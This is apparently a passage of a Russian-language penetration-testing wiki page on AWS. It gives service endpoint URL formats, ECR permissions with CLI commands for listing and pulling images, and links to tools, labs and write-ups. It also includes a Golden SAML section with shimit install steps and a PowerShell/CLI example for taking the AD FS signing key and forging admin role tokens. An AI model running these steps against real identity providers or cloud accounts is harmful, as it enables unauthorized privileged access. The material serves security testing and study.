</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]